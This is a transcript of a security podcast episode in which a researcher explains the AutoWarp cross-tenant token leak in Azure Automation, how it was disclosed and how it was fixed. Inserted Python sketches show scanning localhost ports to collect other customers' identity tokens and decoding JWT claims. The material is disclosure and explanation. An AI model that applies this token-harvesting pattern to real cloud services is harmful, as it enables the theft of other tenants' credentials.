AutoWarp bug leads to Automation headaches.
Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Research Saturday." I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities, solving some of the hard problems of protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
Yanir Tsarimi: I was looking for a new research target, and I somehow randomly got to Azure Automation, and, like, it made my - like, my eyes pop up, and I thought, like, OK, this might be interesting, and I wanted to look further.
Dave Bittner: That's Yanir Tsarimi. He's a cloud security researcher at Orca Security. The research we're discussing today is titled "AutoWarp: Critical Cross-Account Vulnerability in Microsoft Azure Automation Service."
Yanir Tsarimi: So this is, like, how I got it - how I got to it. It was really, really random. Some may say it was, like, a stroke of luck, like how it all went down, but it was really like - it's my job. I like it. I do the research, and I got specifically to Azure Automation, like, in a random way.
Dave Bittner: Well, there is that old saying that luck favors the prepared mind, so I suppose, one way, you know, you were primed to notice something that caught your attention, as you say. So walk me through this. I mean, what exactly was it that caught your eye?
Yanir Tsarimi: So when I was looking at the automation service, I saw that you can upload scripts, and it will run them inside the environment of Azure. And I was like, OK, so let's see what I can do with it. So I uploaded a simple Python script, and I started a reverse shell. So I had, like, a reverse shell inside the environment. So I was just, like, typing up commands and looking around - what processes are running inside, what files are there? And I was looking around in the file system, and I remember that I've seen, like, a strange directory in the C hard drive.
Yanir Tsarimi: So I was looking at the directory, and inside I saw a log file. So it was, like, a folder that you don't usually see on, like, a standard Windows machine. So I was, like, looking at the log and, like, reading it. It was pretty short, like a - just a few lines. And I remember seeing, like, an HTTP URL inside the log file, and I said, OK, is there an HTTP server set up locally? Because the URL was pointing to localhost, and it had, like, a weird port. The port was 40008 - something like that. It was, like, a completely random number. Like, I didn't really understand - why would someone, like, choose this number specifically? So it's, like, something that caught my eye. So I wanted to understand - why is there a server, and why this port specifically?
Yanir Tsarimi: I started with making requests to the local server, you know, just to see what would come up. And I got, like, errors and, like, forbidden. So I just looked more inside the machine until I've seen that there are, like, DLL files - those DLL files are the code of the sandbox, because when you run inside the automation environment, you're basically running inside the machine with other customers, but you are supposed to be isolated from other customers. So I took this code, and I started looking into it - I did, like, reverse engineering of the code. And I saw that that server was actually an interesting server, because you could actually make a request and receive the token of your managed identity.
Yanir Tsarimi: So what is the managed identity? It's basically a token that allows you to access all the resources in your Azure account. So when you have this token - for example, if I want to use Azure Automation to, like, create a new virtual machine inside my Azure account, I can use this token and give it permissions to create that virtual machine. And when I can have this token and use it, like, for all the resources, this could be interesting. So I didn't really know if this would be interesting or not because I only knew the basics at this point. The only thing that mattered to me is, like, that random number that the software engineers chose for this port, for this server.
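[The token-fetch step described above can be sketched roughly as follows. The endpoint path, query shape, and response format are assumptions made for illustration - the actual internals of the Azure Automation sandbox server are not publicly documented.]

```python
# Minimal sketch of asking the local sandbox server for a managed identity
# token, as described in the interview. The "/oauth2/token" path and the
# "access_token" field are hypothetical stand-ins for the real protocol.
import json
import urllib.error
import urllib.request

def request_identity_token(port: int, timeout: float = 2.0):
    """Ask the local server on `port` for a token.

    Returns the token string, or None if the server is unreachable
    or the response is not what we expect.
    """
    url = f"http://127.0.0.1:{port}/oauth2/token"  # hypothetical path
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = json.loads(resp.read().decode())
            return body.get("access_token")
    except (urllib.error.URLError, OSError, ValueError):
        return None

# Outside the Automation sandbox nothing is listening here, so this
# simply returns None.
print(request_identity_token(40008))
```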
Dave Bittner: At this point, I mean, the token that you've gotten back is your token. So am I correct there?
Yanir Tsarimi: Yeah. So I was using my own port. Like, it was, like, my own assigned server, so the token was for my account, yeah.
Dave Bittner: I see. So nothing terribly unusual there or, you know, raising any red flags when it comes to security of that?
Yanir Tsarimi: So yeah, it was - it seemed like it should be happening. Like, it seemed like a feature, not a bug. But when I thought about it, like, after a few minutes, like, I started to think, OK, when I started a new automation job, I saw that this port in the log file changed. Like, it was 40008, and sometimes it was 40020. Like, it was, like, around 40000, but it changed. Like, each time I ran a new job, I got a different port. So I said, OK, they're assigning, like, a random port. So I wanted to know - like, it seemed natural to me that they were trying to create some kind of isolation because when I was researching that server, I saw that they had some kind of authentication in place and security, like, to prevent, like, unauthorized access to the server.
Yanir Tsarimi: But the problem is, when I started scanning inside the machine, I saw that other ports are available, and they answer to me just like my own server. So I just started saying, OK, let's try to make the same request for the token. But instead of using my own port, I will try to use other ports around that range. So I went from 40000 and, like, up - I did try, like, 100 ports up. And I started to receive tokens. So I was like - when I saw the tokens, I was, like, taken aback. Like, OK, what is going on here? This seemed...
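[The scanning step - trying the same token request against roughly 100 ports above 40000 - could look something like this sketch. As before, the endpoint path and response field are assumed for illustration.]

```python
# Sketch of probing the port range Yanir describes and collecting any
# tokens that come back. The "/oauth2/token" path is a hypothetical
# stand-in; the 40000 + 100 range comes from the interview.
import json
import urllib.error
import urllib.request

def scan_for_tokens(base_port: int = 40000, count: int = 100) -> dict:
    """Probe base_port .. base_port+count-1 and return {port: token}."""
    found = {}
    for port in range(base_port, base_port + count):
        url = f"http://127.0.0.1:{port}/oauth2/token"  # hypothetical path
        try:
            with urllib.request.urlopen(url, timeout=0.5) as resp:
                token = json.loads(resp.read().decode()).get("access_token")
                if token:
                    found[port] = token
        except (urllib.error.URLError, OSError, ValueError):
            continue  # nothing listening, or not the token server
    return found

# On a machine outside the Automation sandbox, no such servers exist,
# so the result is an empty dict.
print(scan_for_tokens())
```

Inside the vulnerable sandbox, each entry in the result would have been another customer's managed identity token - which is exactly what made this a cross-account issue.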
Dave Bittner: Is this what I think it is?
Yanir Tsarimi: Yeah, this one, it really caught me off guard. Like, I was, like, 2 hours into looking at the service, and I thought, there's no way that something like this would be so easy. I was taking the token. And the thing with this token is it's a JWT, a JSON Web Token, so you can actually, like, decode it and, like, see what data is stored inside the token. What I did is I looked at the data of the tokens I received, and I've seen that they are attached to other customers' subscriptions. So I've seen, like, subscriptions of other companies, and I've seen names and all that kind of stuff. So I was like, OK, this is an issue. Like, this is really something I shouldn't be having.
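[The JWT inspection step is straightforward to demonstrate: the middle segment of a JWT is just base64url-encoded JSON, so the claims can be read without any key. The sketch below builds a toy token with made-up, Azure-style claims to show the decoding.]

```python
# Decode the payload segment of a JWT without verifying the signature -
# enough to see which tenant/subscription a token belongs to.
import base64
import json

def jwt_claims(token: str) -> dict:
    """Return the claims in a JWT's payload (no signature check)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

def seg(d: dict) -> str:
    """base64url-encode a dict the way JWT segments are encoded."""
    return base64.urlsafe_b64encode(json.dumps(d).encode()).decode().rstrip("=")

# Toy token: header.payload.signature, with a hypothetical tenant id claim.
claims = {"tid": "11111111-2222-3333-4444-555555555555", "sub": "example"}
token = f'{seg({"alg": "RS256"})}.{seg(claims)}.sig'
print(jwt_claims(token)["tid"])  # → 11111111-2222-3333-4444-555555555555
```

In the real incident, decoding a received token this way is what revealed that it belonged to a different customer's subscription.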
Yanir Tsarimi: So I set up, like, let's say a victim account just to try to see if I can actually access another account through this token. And I actually - it actually worked. And I was, like, even more surprised that it actually worked, like, against the Azure API. Like, if the customer gave any permissions, you could just use those permissions in their account. So I was, like, really, really surprised. And I was, like, holding my head. Like, I can't believe this really - it was really this simple. And I just - I, like - I don't have any more to say. Like, this - it's something, like, feels, like, a bit bizarre or surreal, something like this to happen.
Dave Bittner: Right. So at that point, what did you think? I mean, do you say to yourself, well, I - you know, I need to get in touch with Microsoft about this?
Yanir Tsarimi: Yeah. So there's this, like, standard procedure here. We do the security research and the moment we find something that we think is a security issue, like, we go straight ahead. I wrote up the report to Microsoft the same day and submitted it to them, and they fixed it within four days, I think.
Dave Bittner: And what was the fix?
Yanir Tsarimi: So the issue was that you could access - you could just ask for the tokens, right? So they had to put some kind of authentication in place or block it entirely, like, the access to the server. So Microsoft chose to mitigate this by requiring a special, like, secret token that only the customer itself should know. So when you start up a new automation job, in your environment variables, you get the special token. And when you request the managed identity token from the server, you need to send them this token that you have in your environment variables.
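[The mitigation described above - a per-job secret delivered through the environment and echoed back with each token request - could look something like this sketch. The environment variable name and header name are made up for illustration; the real names Microsoft uses are not given in the interview.]

```python
# Sketch of the fix: only a client holding the per-job secret (placed in
# the job's environment by the sandbox) can request the identity token.
# AUTOMATION_JOB_SECRET and X-Job-Secret are hypothetical names.
import os
import urllib.request

def build_token_request(port: int) -> urllib.request.Request:
    """Attach the per-job secret from the environment to the request."""
    secret = os.environ["AUTOMATION_JOB_SECRET"]  # hypothetical variable
    req = urllib.request.Request(f"http://127.0.0.1:{port}/oauth2/token")
    req.add_header("X-Job-Secret", secret)  # hypothetical header
    return req

# Simulate the sandbox injecting the secret into the job's environment.
os.environ["AUTOMATION_JOB_SECRET"] = "demo-secret"
req = build_token_request(40008)
print(req.get_header("X-job-secret"))  # urllib normalizes header case
```

The point of the design is that a neighbor probing other ports never sees your job's environment variables, so it cannot supply the secret your server expects.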
Dave Bittner: I see. Now, one of the things you point out in the research you published online here is that Microsoft was quite responsive to you reaching out. They were a good partner here.
Yanir Tsarimi: Yeah, I was - it was a really good experience with Microsoft. Like, they responded very, very quickly to all my emails, and they were really appreciative and cooperative in, like, fixing this problem. It was really a positive experience. Like, I think that this is the thing that makes me, as a security researcher, want to keep going and keep, like, finding more security vulnerabilities and report them to the vendors who treat me, like, with respect and cooperation.
Dave Bittner: It also strikes me that, you know, part of what allowed you to get as far as you did with this was that there were several steps along the way where a lot of people would have given up or moved on to something else. And you hung in there and kept digging.
Yanir Tsarimi: Yeah, this is actually an interesting part about security research, is that you can, like, do research on one thing for, like, months and have nothing. But as long as you keep learning about your target and you just be persistent, you will find something. Like, it's the farther you go and the deeper you go, you will find issues that other people who gave up will not find. Like, there's no other way to go about it. You have to go the furthest to find the most interesting and severe vulnerabilities. In this case, it was - it all happened quite fast. But in other security research that I did, it usually took a lot longer to get to security problems like this.
Dave Bittner: And are you satisfied that this has been properly mitigated?
Yanir Tsarimi: Yes, I think Microsoft cares about those issues. And I think we have a very good reason to keep going and look for more of those.
Dave Bittner: What are your recommendations for folks to protect themselves against these sorts of things? I mean, I suppose there's no evidence that this itself was being exploited. But, you know, it strikes me as one of those things that someone using Microsoft Azure, for example, you know, they wouldn't have known that this was an issue.
Yanir Tsarimi: I can speak, like, specifically to this case. I think the concept of least privilege would be really helpful here. If you used Azure Automation and you assigned, like, only the minimal permissions that you actually need - or even didn't assign any permissions at all if you don't need them - you would be at significantly less risk compared to someone who just gave all the permissions to the managed identity. Like, the concept of least privilege really shows that it matters what you do and the decisions you make. Even as a customer, it can change how severely an issue like this can expose you.
Dave Bittner: Our thanks to Yanir Tsarimi from Orca Security for joining us. The research is titled "AutoWarp: Critical Cross-Account Vulnerability in Microsoft Azure Automation Service." We'll have a link in the show notes.
Dave Bittner: The CyberWire podcast is proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies. Our amazing CyberWire team is Rachel Gelfand, Liz Irvin, Elliott Peltzman, Tre Hester, Brandon Karpf, Eliana White, Puru Prakash, Justin Sabie, Tim Nodar, Joe Carrigan, Carole Theriault, Ben Yelin, Nick Veliky, Gina Johnson, Bennett Moe, Chris Russell, John Petrik, Jennifer Eiben, Rick Howard, Peter Kilpe, and I'm Dave Bittner. Thanks for listening. We'll see you back here next week.